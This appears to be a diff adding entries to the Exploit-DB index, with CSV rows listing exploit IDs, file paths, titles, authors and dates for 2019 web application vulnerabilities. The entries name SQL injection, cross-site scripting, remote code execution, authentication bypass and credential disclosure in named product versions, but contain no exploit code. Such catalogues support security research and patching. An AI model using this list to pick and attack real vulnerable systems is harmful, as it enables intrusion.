+46811,exploits/linux/webapps/46811.txt,"NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass",2019-05-08,MobileNetworkSecurity,webapps,linux,
+46815,exploits/php/webapps/46815.txt,"Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting",2019-05-09,"Ibrahim Raafat",webapps,php,
+46820,exploits/multiple/webapps/46820.txt,"Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple,
+46825,exploits/jsp/webapps/46825.txt,"dotCMS 5.1.1 - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,jsp,
+46826,exploits/hardware/webapps/46826.txt,"RICOH SP 4510DN Printer - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,hardware,
+46827,exploits/hardware/webapps/46827.txt,"RICOH SP 4520DN Printer - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,hardware,
+46828,exploits/multiple/webapps/46828.txt,"CyberArk Enterprise Password Vault 10.7 - XML External Entity Injection",2019-05-10,"Marcelo Toran",webapps,multiple,
+46832,exploits/php/webapps/46832.txt,"SOCA Access Control System 180612 - Information Disclosure",2019-05-13,LiquidWorm,webapps,php,
+46833,exploits/php/webapps/46833.txt,"SOCA Access Control System 180612 - SQL Injection",2019-05-13,LiquidWorm,webapps,php,80
+46834,exploits/php/webapps/46834.txt,"SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)",2019-05-13,LiquidWorm,webapps,php,
+46835,exploits/php/webapps/46835.txt,"XOOPS 2.5.9 - SQL Injection",2019-05-13,"felipe andrian",webapps,php,80
+46838,exploits/php/webapps/46838.txt,"OpenProject 5.0.0 - 8.3.1 - SQL Injection",2019-05-13,"SEC Consult",webapps,php,
+46840,exploits/php/webapps/46840.txt,"Sales ERP 8.1 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80
+46841,exploits/hardware/webapps/46841.txt,"D-Link DWL-2600AP - Multiple OS Command Injection",2019-05-14,"Raki Ben Hamouda",webapps,hardware,
+46846,exploits/php/webapps/46846.txt,"Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection",2019-05-14,"Julien Ahrens",webapps,php,80
+46847,exploits/php/webapps/46847.txt,"PasteShr 1.6 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80
+46849,exploits/php/webapps/46849.txt,"CommSy 8.6.5 - SQL injection",2019-05-15,"Jens Regel",webapps,php,
+46850,exploits/php/webapps/46850.txt,"Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting",2019-05-15,LiquidWorm,webapps,php,
+46852,exploits/php/webapps/46852.txt,"DeepSound 1.0.4 - SQL Injection",2019-05-16,"Mehmet EMIROGLU",webapps,php,80
+46864,exploits/php/webapps/46864.txt,"Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution",2019-05-17,"numan türle",webapps,php,
+46869,exploits/php/webapps/46869.py,"eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution",2019-05-20,liquidsky,webapps,php,
+46881,exploits/php/webapps/46881.txt,"Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting",2019-05-21,"Dionach Ltd",webapps,php,
+46882,exploits/hardware/webapps/46882.txt,"TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting",2019-05-21,"purnendu ghosh",webapps,hardware,
+46885,exploits/java/webapps/46885.txt,"Oracle CTI Web Service - 'EBS_ASSET_HISTORY_OPERATIONS' XML Entity Injection",2019-05-21,omurugur,webapps,java,
+46886,exploits/php/webapps/46886.py,"WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities",2019-05-21,"Simone Quatrini",webapps,php,80
+46887,exploits/java/webapps/46887.txt,"Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution",2019-05-21,"Jakub Palaczynski",webapps,java,
+46894,exploits/multiple/webapps/46894.txt,"Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions",2019-05-22,Vingroup,webapps,multiple,
+46895,exploits/multiple/webapps/46895.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting",2019-05-22,Vingroup,webapps,multiple,
+46896,exploits/hardware/webapps/46896.txt,"AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting",2019-05-22,Luca.Chiou,webapps,hardware,
+46897,exploits/hardware/webapps/46897.txt,"Carel pCOWeb < B1.2.1 - Cross-Site Scripting",2019-05-22,Luca.Chiou,webapps,hardware,
+46898,exploits/hardware/webapps/46898.txt,"Carel pCOWeb < B1.2.1 - Credentials Disclosure",2019-05-22,Luca.Chiou,webapps,hardware,
+46903,exploits/php/webapps/46903.txt,"Horde Webmail 5.2.22 - Multiple Vulnerabilities",2019-05-22,InfinitumIT,webapps,php,
+46910,exploits/php/webapps/46910.txt,"Nagios XI 5.6.1 - SQL injection",2019-05-23,JameelNabbo,webapps,php,
+46921,exploits/php/webapps/46921.sh,"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC",2019-05-24,"Todor Donev",webapps,php,
+46931,exploits/multiple/webapps/46931.txt,"Deltek Maconomy 2.2.5 - Local File Inclusion",2019-05-27,JameelNabbo,webapps,multiple,
+46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,
+46936,exploits/php/webapps/46936.txt,"pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting",2019-05-29,"Chi Tran",webapps,php,
+47077,exploits/php/webapps/47077.txt,"Karenderia Multiple Restaurant System 5.3 - SQL Injection",2019-07-08,"Mehmet EMIROGLU",webapps,php,80
+46956,exploits/php/webapps/46956.txt,"KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities",2019-06-03,SlidingWindow,webapps,php,
+46957,exploits/hardware/webapps/46957.txt,"AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control",2019-06-03,Luca.Chiou,webapps,hardware,
+46958,exploits/php/webapps/46958.txt,"WordPress Plugin Form Maker 1.13.3 - SQL Injection",2019-06-03,"Daniele Scanu",webapps,php,
+46959,exploits/php/webapps/46959.txt,"IceWarp 10.4.4 - Local File Inclusion",2019-06-04,JameelNabbo,webapps,php,
+46963,exploits/java/webapps/46963.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
+46964,exploits/java/webapps/46964.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
+46965,exploits/java/webapps/46965.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
+46966,exploits/java/webapps/46966.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
+46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,
+46971,exploits/hardware/webapps/46971.txt,"Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion",2019-06-06,"Dhiraj Mishra",webapps,hardware,
+46977,exploits/php/webapps/46977.txt,"UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting",2019-06-10,Unk9vvN,webapps,php,80
+46981,exploits/php/webapps/46981.txt,"WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution",2019-06-11,xulchibalraa,webapps,php,80
+46982,exploits/php/webapps/46982.txt,"phpMyAdmin 4.8 - Cross-Site Request Forgery",2019-06-11,Riemann,webapps,php,
+46983,exploits/jsp/webapps/46983.txt,"Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting",2019-06-11,"Valerio Brussani",webapps,jsp,
+46985,exploits/php/webapps/46985.py,"FusionPBX 4.4.3 - Remote Command Execution",2019-06-12,"Dustin Cobb",webapps,php,
+46987,exploits/aspx/webapps/46987.txt,"Sitecore 8.x - Deserialization Remote Code Execution",2019-06-13,"Jarad Kopf",webapps,aspx,
+46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,
+46993,exploits/hardware/webapps/46993.txt,"CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities",2019-06-17,"Alex Akinbi",webapps,hardware,
+47000,exploits/java/webapps/47000.txt,"Spring Security OAuth - Open Redirector",2019-06-17,Riemann,webapps,java,
+47005,exploits/multiple/webapps/47005.txt,"Sahi pro 7.x/8.x - Directory Traversal",2019-06-18,"Goutham Madhwaraj",webapps,multiple,
+47006,exploits/multiple/webapps/47006.txt,"Sahi pro 8.x - SQL Injection",2019-06-18,"Goutham Madhwaraj",webapps,multiple,
+47007,exploits/multiple/webapps/47007.txt,"Sahi pro 8.x - Cross-Site Scripting",2019-06-18,"Goutham Madhwaraj",webapps,multiple,
+47010,exploits/aspx/webapps/47010.py,"BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Execution",2019-06-19,"Aaron Bishop",webapps,aspx,
+47011,exploits/aspx/webapps/47011.py,"BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution",2019-06-19,"Aaron Bishop",webapps,aspx,
+47013,exploits/php/webapps/47013.py,"WebERP 4.15 - SQL injection",2019-06-20,"Semen Alexandrovich Lyhin",webapps,php,
+47014,exploits/aspx/webapps/47014.py,"BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection",2019-06-20,"Aaron Bishop",webapps,aspx,
+47021,exploits/php/webapps/47021.txt,"dotProject 2.1.9 - SQL Injection",2019-06-24,"Metin Yunus Kandemir",webapps,php,
+47023,exploits/php/webapps/47023.txt,"SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting",2019-06-24,"Nimit Jain",webapps,php,
+47024,exploits/php/webapps/47024.txt,"SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting",2019-06-24,"Nimit Jain",webapps,php,
+47022,exploits/php/webapps/47022.txt,"SeedDMS versions < 5.1.11 - Remote Command Execution",2019-06-24,"Nimit Jain",webapps,php,
+47027,exploits/multiple/webapps/47027.py,"GrandNode 4.40 - Path Traversal / Arbitrary File Download",2019-06-24,"Corey Robinson",webapps,multiple,
+47033,exploits/hardware/webapps/47033.html,"Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution",2019-06-25,XORcat,webapps,hardware,
+47034,exploits/php/webapps/47034.txt,"AZADMIN CMS 1.0 - SQL Injection",2019-06-25,"felipe andrian",webapps,php,80
+47035,exploits/aspx/webapps/47035.py,"BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal",2019-06-25,"Aaron Bishop",webapps,aspx,
+47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,80
+47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited  2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,80
+47044,exploits/php/webapps/47044.py,"LibreNMS 1.46 - 'addhost' Remote Code Execution",2019-06-28,Askar,webapps,php,80
+47045,exploits/php/webapps/47045.txt,"WorkSuite PRM 2.4 - 'password' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80
+47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80
+47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,80
+47059,exploits/linux/webapps/47059.txt,"PowerPanel Business Edition - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,linux,
+47060,exploits/php/webapps/47060.txt,"ZoneMinder 1.32.3 - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,php,
+47061,exploits/multiple/webapps/47061.txt,"SAP Crystal Reports - Information Disclosure",2019-07-01,"Mohamed M.Fouad",webapps,multiple,
+47062,exploits/multiple/webapps/47062.py,"Sahi pro 8.x - Directory Traversal",2019-07-01,Operat0r,webapps,multiple,
+47063,exploits/multiple/webapps/47063.html,"CyberPanel 1.8.4 - Cross-Site Request Forgery",2019-07-01,"Bilgi Birikim Sistemleri",webapps,multiple,
+47064,exploits/hardware/webapps/47064.txt,"FaceSentry Access Control System 6.4.8 - Remote Command Injection",2019-07-01,LiquidWorm,webapps,hardware,
+47065,exploits/hardware/webapps/47065.txt,"FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery",2019-07-01,LiquidWorm,webapps,hardware,
+47066,exploits/hardware/webapps/47066.py,"FaceSentry Access Control System 6.4.8 - Remote Root Exploit",2019-07-01,LiquidWorm,webapps,hardware,
+47069,exploits/php/webapps/47069.py,"Centreon 19.04  - Remote Code Execution",2019-07-02,Askar,webapps,php,
+47071,exploits/multiple/webapps/47071.txt,"Symantec DLP 15.5 MP1 - Cross-Site Scripting",2019-07-03,"Chapman Schleiss",webapps,multiple,8443
+47075,exploits/php/webapps/47075.txt,"Karenderia Multiple Restaurant System 5.3 - Local File Inclusion",2019-07-05,"Mehmet EMIROGLU",webapps,php,
+47078,exploits/php/webapps/47078.txt,"WordPress Plugin Like Button 1.6.0 - Authentication Bypass",2019-07-08,"Benjamin Lim",webapps,php,80
+47106,exploits/aspx/webapps/47106.txt,"Sitecore 9.0 rev 171002 - Persistent Cross-Site Scripting",2019-07-11,"Owais Mehtab",webapps,aspx,443
+47107,exploits/hardware/webapps/47107.txt,"Tenda D301 v2 Modem Router - Persistent Cross-Site Scripting",2019-07-12,ABDO10,webapps,hardware,80
+47109,exploits/php/webapps/47109.txt,"MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting",2019-07-12,"Metin Yunus Kandemir",webapps,php,80
+47110,exploits/java/webapps/47110.py,"Sahi Pro 8.0.0 - Remote Command Execution",2019-07-12,AkkuS,webapps,java,
+47111,exploits/java/webapps/47111.txt,"Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting",2019-07-12,"Ishaq Mohammed",webapps,java,
+47112,exploits/cgi/webapps/47112.py,"Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution",2019-07-12,"Chris Lyne",webapps,cgi,
+47117,exploits/hardware/webapps/47117.txt,"NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass",2019-07-15,Wadeek,webapps,hardware,
+47118,exploits/hardware/webapps/47118.txt,"CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities",2019-07-15,Ramikan,webapps,hardware,
+47121,exploits/php/webapps/47121.txt,"FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion",2019-07-15,"Mohammed Althibyani",webapps,php,80
+47123,exploits/linux/webapps/47123.txt,"CentOS Control Web Panel 0.9.8.836 - Authentication Bypass",2019-07-16,"Pongtorn Angsuchotmetee",webapps,linux,
+47124,exploits/linux/webapps/47124.txt,"CentOS Control Web Panel 0.9.8.836 - Privilege Escalation",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,
+47125,exploits/linux/webapps/47125.txt,"CentOS Control Web Panel 0.9.8.838 - User Enumeration",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,
+47132,exploits/linux/webapps/47132.txt,"Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting",2019-07-17,"Sarath Nair",webapps,linux,
+47136,exploits/linux/webapps/47136.txt,"WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting",2019-07-18,LiquidWorm,webapps,linux,
+47138,exploits/linux/webapps/47138.py,"fuelCMS 1.4.1 - Remote Code Execution",2019-07-19,0xd0ff9,webapps,linux,
+47139,exploits/linux/webapps/47139.txt,"Web Ofisi E-Ticaret 3 - 'a' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47140,exploits/linux/webapps/47140.txt,"Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47141,exploits/linux/webapps/47141.txt,"Web Ofisi Emlak 2 - 'ara' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47142,exploits/linux/webapps/47142.txt,"Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47143,exploits/linux/webapps/47143.txt,"Web Ofisi Firma Rehberi 1 - 'il' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47144,exploits/linux/webapps/47144.txt,"Web Ofisi Rent a Car 3 - 'klima' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47145,exploits/linux/webapps/47145.txt,"Web Ofisi Firma 13 - 'oz' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47146,exploits/php/webapps/47146.txt,"REDCap < 9.1.2 - Cross-Site Scripting",2019-07-19,"Alexandre ZANNI",webapps,php,
+47150,exploits/linux/webapps/47150.txt,"Axway SecureTransport 5 - Unauthenticated XML Injection",2019-07-22,"Dominik Penner",webapps,linux,
+47152,exploits/php/webapps/47152.txt,"NoviSmart CMS - SQL injection",2019-07-24,n1x_,webapps,php,
+47153,exploits/hardware/webapps/47153.txt,"Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery",2019-07-24,"Mehmet Onder",webapps,hardware,
+47154,exploits/php/webapps/47154.py,"WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions",2019-07-24,yasin,webapps,php,
+47159,exploits/php/webapps/47159.txt,"Ovidentia 8.4.3 - Cross-Site Scripting",2019-07-25,n3k00n3,webapps,php,80
+47160,exploits/php/webapps/47160.txt,"Ovidentia 8.4.3 - SQL Injection",2019-07-25,UserX,webapps,php,80
+47177,exploits/php/webapps/47177.txt,"Moodle Filepicker 3.5.2 - Server Side Request Forgery",2019-07-26,"Fabian Mosch_ Nick Theisinger",webapps,php,80
+47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution",2019-07-26,"Wietse Boonstra",webapps,jsp,
+47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",2019-07-26,"Wietse Boonstra",webapps,jsp,443
+47181,exploits/jsp/webapps/47181.txt,"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection",2019-07-26,"Wietse Boonstra",webapps,jsp,80
+47182,exploits/php/webapps/47182.html,"WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery",2019-07-29,rubyman,webapps,php,80
+47184,exploits/php/webapps/47184.txt,"WordPress Theme Real Estate 2.8.9 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80
+47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80
+47188,exploits/hardware/webapps/47188.py,"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming",2019-07-30,"Jacob Baines",webapps,hardware,
+47196,exploits/multiple/webapps/47196.txt,"Oracle Hyperion Planning 11.1.2.3 - XML External Entity",2019-07-31,"Lucas Dinucci",webapps,multiple,
+47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80
+47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,80
+47203,exploits/hardware/webapps/47203.html,"Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery",2019-08-01,"Alperen Soydan",webapps,hardware,80
+47204,exploits/php/webapps/47204.txt,"Sar2HTML 3.2.1 - Remote Command Execution",2019-08-02,"Cemal Cihad ÇİFTÇİ",webapps,php,80
+47297,exploits/multiple/webapps/47297.rb,"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)",2019-08-21,"Alyssa Herrera",webapps,multiple,
+47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80
+47206,exploits/php/webapps/47206.txt,"1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting",2019-08-02,"Kusol Watchara-Apanukorn",webapps,php,80
+47210,exploits/php/webapps/47210.txt,"WordPress Plugin JoomSport 3.3 - SQL Injection",2019-08-07,"Pablo Santiago",webapps,php,80
+47212,exploits/php/webapps/47212.txt,"Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting",2019-08-08,Greg.Priest,webapps,php,80
+47213,exploits/php/webapps/47213.txt,"Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)",2019-08-08,"Mr Winst0n",webapps,php,80
+47214,exploits/multiple/webapps/47214.txt,"Aptana Jaxer 1.0.3.4547 - Local File inclusion",2019-08-08,"Steph Jensen",webapps,multiple,
+47216,exploits/php/webapps/47216.txt,"Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download",2019-08-08,qw3rTyTy,webapps,php,80
+47217,exploits/php/webapps/47217.txt,"Adive Framework 2.0.7 - Cross-Site Request Forgery",2019-08-08,"Pablo Santiago",webapps,php,80
+47218,exploits/php/webapps/47218.txt,"Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection",2019-08-08,qw3rTyTy,webapps,php,80
+47219,exploits/php/webapps/47219.txt,"BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting",2019-08-12,"Angelo Ruwantha",webapps,php,80
+47220,exploits/hardware/webapps/47220.rb,"Cisco Adaptive Security Appliance - Path Traversal (Metasploit)",2019-08-12,"Angelo Ruwantha",webapps,hardware,443
+47221,exploits/php/webapps/47221.txt,"UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting",2019-08-12,Greg.Priest,webapps,php,80
+47222,exploits/php/webapps/47222.txt,"Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection",2019-08-12,qw3rTyTy,webapps,php,80
+47223,exploits/php/webapps/47223.txt,"Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion",2019-08-12,qw3rTyTy,webapps,php,80
+47224,exploits/php/webapps/47224.txt,"osTicket 1.12 - Persistent Cross-Site Scripting via File Upload",2019-08-12,"Aishwarya Iyer",webapps,php,80
+47225,exploits/php/webapps/47225.txt,"osTicket 1.12 - Formula Injection",2019-08-12,"Aishwarya Iyer",webapps,php,80
+47226,exploits/php/webapps/47226.txt,"osTicket 1.12 - Persistent Cross-Site Scripting",2019-08-12,"Aishwarya Iyer",webapps,php,80
+47232,exploits/php/webapps/47232.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection",2019-08-12,qw3rTyTy,webapps,php,80
+47234,exploits/php/webapps/47234.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download",2019-08-12,xerubus,webapps,php,80
+47235,exploits/php/webapps/47235.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell",2019-08-12,xerubus,webapps,php,
+47247,exploits/php/webapps/47247.txt,"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting",2019-08-14,"Ilca Lucian Florin",webapps,php,80
+47249,exploits/php/webapps/47249.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection",2019-08-14,qw3rTyTy,webapps,php,80
+47250,exploits/hardware/webapps/47250.rb,"D-Link DIR-600M - Authentication Bypass (Metasploit)",2019-08-14,"Devendra Singh Solanki",webapps,hardware,80
+47251,exploits/php/webapps/47251.txt,"WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery",2019-08-14,"Princy Edward",webapps,php,80
+47252,exploits/windows/webapps/47252.txt,"TortoiseSVN 1.12.1 - Remote Code Execution",2019-08-14,Vulnerability-Lab,webapps,windows,
+47255,exploits/windows/webapps/47255.py,"ManageEngine opManager 12.3.150 - Authenticated Code Execution",2019-08-14,kindredsec,webapps,windows,
+47280,exploits/php/webapps/47280.py,"EyesOfNetwork 5.1 - Authenticated Remote Command Execution",2019-08-16,"Nassim Asrir",webapps,php,
+47281,exploits/php/webapps/47281.txt,"Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion",2019-08-16,qw3rTyTy,webapps,php,
+47283,exploits/php/webapps/47283.txt,"Integria IMS 5.0.86 - Arbitrary File Upload",2019-08-16,Greg.Priest,webapps,php,
+47284,exploits/asp/webapps/47284.txt,"Web Wiz Forums 12.01 - 'PF' SQL Injection",2019-08-16,n1x_,webapps,asp,
+47286,exploits/php/webapps/47286.txt,"Kimai 2 - Persistent Cross-Site Scripting",2019-08-19,osamaalaa,webapps,php,80
+47287,exploits/hardware/webapps/47287.rb,"FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)",2019-08-19,"Carlos E. Vieira",webapps,hardware,
+47288,exploits/hardware/webapps/47288.py,"FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure",2019-08-19,"Carlos E. Vieira",webapps,hardware,
+47289,exploits/php/webapps/47289.txt,"Neo Billing 3.5 - Persistent Cross-Site Scripting",2019-08-19,n1x_,webapps,php,80
+47293,exploits/linux/webapps/47293.sh,"Webmin 1.920 - Remote Code Execution",2019-08-19,"Fernando A. Lagos B",webapps,linux,
+47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80
+47295,exploits/php/webapps/47295.html,"WordPress Add Mime Types Plugin 2.2.1 - Cross-Site Request Forgery",2019-08-20,"Princy Edward",webapps,php,
+47301,exploits/multiple/webapps/47301.txt,"Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal",2019-08-23,MaYaSeVeN,webapps,multiple,
+47302,exploits/windows/webapps/47302.txt,"LSoft ListServ < 16.5-2018a - Cross-Site Scripting",2019-08-26,MTK,webapps,windows,
+47303,exploits/php/webapps/47303.txt,"WordPress Plugin Import Export WordPress Users 1.3.1 - CSV Injection",2019-08-26,"Javier Olmedo",webapps,php,80
+47304,exploits/php/webapps/47304.txt,"WordPress Plugin UserPro 4.9.32 - Cross-Site Scripting",2019-08-26,"Damian Ebelties",webapps,php,80
+47305,exploits/php/webapps/47305.py,"openITCOCKPIT 3.6.1-2 - Cross-Site Request Forgery",2019-08-26,"Julian Rittweger",webapps,php,80
+47308,exploits/multiple/webapps/47308.py,"Tableau - XML External Entity",2019-08-27,"Jarad Kopf",webapps,multiple,
+47310,exploits/php/webapps/47310.txt,"SQLiteManager 1.2.0 / 1.2.4 - Blind SQL Injection",2019-08-28,"Rafael Pedrero",webapps,php,80
+47311,exploits/php/webapps/47311.txt,"Jobberbase 2.0 CMS - 'jobs-in' SQL Injection",2019-08-28,"Suvadip Kar",webapps,php,80
+47312,exploits/php/webapps/47312.html,"WordPress Plugin GoURL.io < 1.4.14 - File Upload",2018-10-31,"Pouya Darabi",webapps,php,
+47314,exploits/php/webapps/47314.sh,"Jobberbase 2.0 - 'subscribe' SQL Injection",2019-08-29,"Damian Ebelties",webapps,php,80
+47315,exploits/php/webapps/47315.txt,"PilusCart 1.4.1 - Local File Disclosure",2019-08-29,"Damian Ebelties",webapps,php,80
+47323,exploits/php/webapps/47323.txt,"Sentrifugo 3.2 - File Upload Restriction Bypass",2019-08-30,creosote,webapps,php,80
+47324,exploits/php/webapps/47324.txt,"Sentrifugo 3.2 - Persistent Cross-Site Scripting",2019-08-30,creosote,webapps,php,80
+47325,exploits/php/webapps/47325.txt,"DomainMod 4.13 - Cross-Site Scripting",2019-08-30,"Damian Ebelties",webapps,php,
+47326,exploits/php/webapps/47326.txt,"YouPHPTube 7.4 - Remote Code Execution",2019-08-30,"Damian Ebelties",webapps,php,80
+47327,exploits/php/webapps/47327.txt,"WordPress Plugin WooCommerce Product Feed 2.2.18 - Cross-Site Scripting",2019-08-30,"Damian Ebelties",webapps,php,80
+47331,exploits/php/webapps/47331.txt,"Opencart 3.x - Cross-Site Scripting",2019-09-02,"Nipun Somani",webapps,php,
+47335,exploits/php/webapps/47335.txt,"Wordpress Plugin Event Tickets 4.10.7.1 - CSV Injection",2019-09-02,MTK,webapps,php,
+47338,exploits/multiple/webapps/47338.txt,"Alkacon OpenCMS 10.5.x - Cross-Site Scripting",2019-09-02,Aetsu,webapps,multiple,
+47339,exploits/multiple/webapps/47339.txt,"Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)",2019-09-02,Aetsu,webapps,multiple,
+47340,exploits/multiple/webapps/47340.txt,"Alkacon OpenCMS 10.5.x - Local File inclusion",2019-09-02,Aetsu,webapps,multiple,
+47343,exploits/php/webapps/47343.txt,"Craft CMS 2.7.9/3.2.5 - Information Disclosure",2019-09-02,"Mohammed Abdul Raheem",webapps,php,
